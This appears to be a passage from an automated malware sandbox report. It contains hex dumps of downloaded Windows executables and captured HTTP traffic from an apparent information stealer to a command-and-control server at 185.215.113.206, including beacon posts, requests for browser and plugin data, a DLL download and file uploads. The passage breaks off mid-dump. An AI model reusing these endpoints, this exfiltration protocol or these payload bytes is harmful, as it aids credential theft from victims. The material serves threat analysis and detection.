20 20 00 80 05 00 00 10 00 00 00 80 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 64 6c 6d 61 6c 6a 68 00 70 2a 00 00 b0 05 00 00 6c 2a 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 79 66 6f 73 6f 72 77 00 10 00 00 00 20 30 00 00 04 00 00 00 02 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 30 00 00 22 00 00 00 06 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 07 Nov 2024 03:13:24 GMTContent-Type: application/octet-streamContent-Length: 2163712Last-Modified: Thu, 07 Nov 2024 02:49:06 GMTConnection: keep-aliveETag: "672c2aa2-210400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 80 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 73 00 00 04 00 00 66 c3 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 73 77 73 78 71 65 62 00 60 1a 00 00 10 59 00 00 52 1a 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6b 71 72 73 76 67 74 00 10 00 00 00 70 73 00 00 06 00 00 00 dc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 73 00 00 22 00 00 00 e2 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 07 Nov 2024 03:13:35 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Thu, 07 Nov 2024 02:39:59 GMTConnection: keep-aliveETag: "672c287f-2a3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 52 4a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6e 68 69 61 76 72 79 00 e0 29 00 00 a0 00 00 00 d4 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 78 75 6a 64 6f 72 6a 00 20 00 00 00 80 2a 00 00 04 00 00 00 0e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 12 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 07 Nov 2024 03:13:45 GMTContent-Type: application/octet-streamContent-Length: 2163712Last-Modified: Thu, 07 Nov 2024 02:49:06 GMTConnection: keep-aliveETag: "672c2aa2-210400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 80 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 73 00 00 04 00 00 66 c3 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 73 77 73 78 71 65 62 00 60 1a 00 00 10 59 00 00 52 1a 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6b 71 72 73 76 67 74 00 10 00 00 00 70 73 00 00 06 00 00 00 dc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 73 00 00 22 00 00 00 e2 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 07 Nov 2024 03:13:51 GMTContent-Type: application/octet-streamContent-Length: 2163712Last-Modified: Thu, 07 Nov 2024 02:49:06 GMTConnection: keep-aliveETag: "672c2aa2-210400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 80 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 73 00 00 04 00 00 66 c3 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 73 77 73 78 71 65 62 00 60 1a 00 00 10 59 00 00 52 1a 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6b 71 72 73 76 67 74 00 10 00 00 00 70 73 00 00 06 00 00 00 dc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 73 00 00 22 00 00 00 e2 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 33 32 46 34 45 41 30 45 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 2d 2d 0d 0a Data Ascii: ------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="hwid"CA32F4EA0EBD3120641781------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="build"tale------AAFIJKKEHJDHJKFIECAA--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFIDBFHDBGIDHJJEGHIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 2d 2d 0d 0a Data Ascii: ------FBFIDBFHDBGIDHJJEGHIContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------FBFIDBFHDBGIDHJJEGHIContent-Disposition: form-data; name="message"browsers------FBFIDBFHDBGIDHJJEGHI--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="message"plugins------AFHDGDGIIDGCFIDHDHDH--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 2d 2d 0d 0a Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="message"fplugins------IDHIEBAAKJDHIECAAFHC--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBKFHIDHIIJJKECGHCFHost: 185.215.113.206Content-Length: 5419Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAKHost: 185.215.113.206Content-Length: 991Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIECHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 2d 2d 0d 0a Data Ascii: ------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file"------GCAFCAFHJJDBFIECFBKE--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIECHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 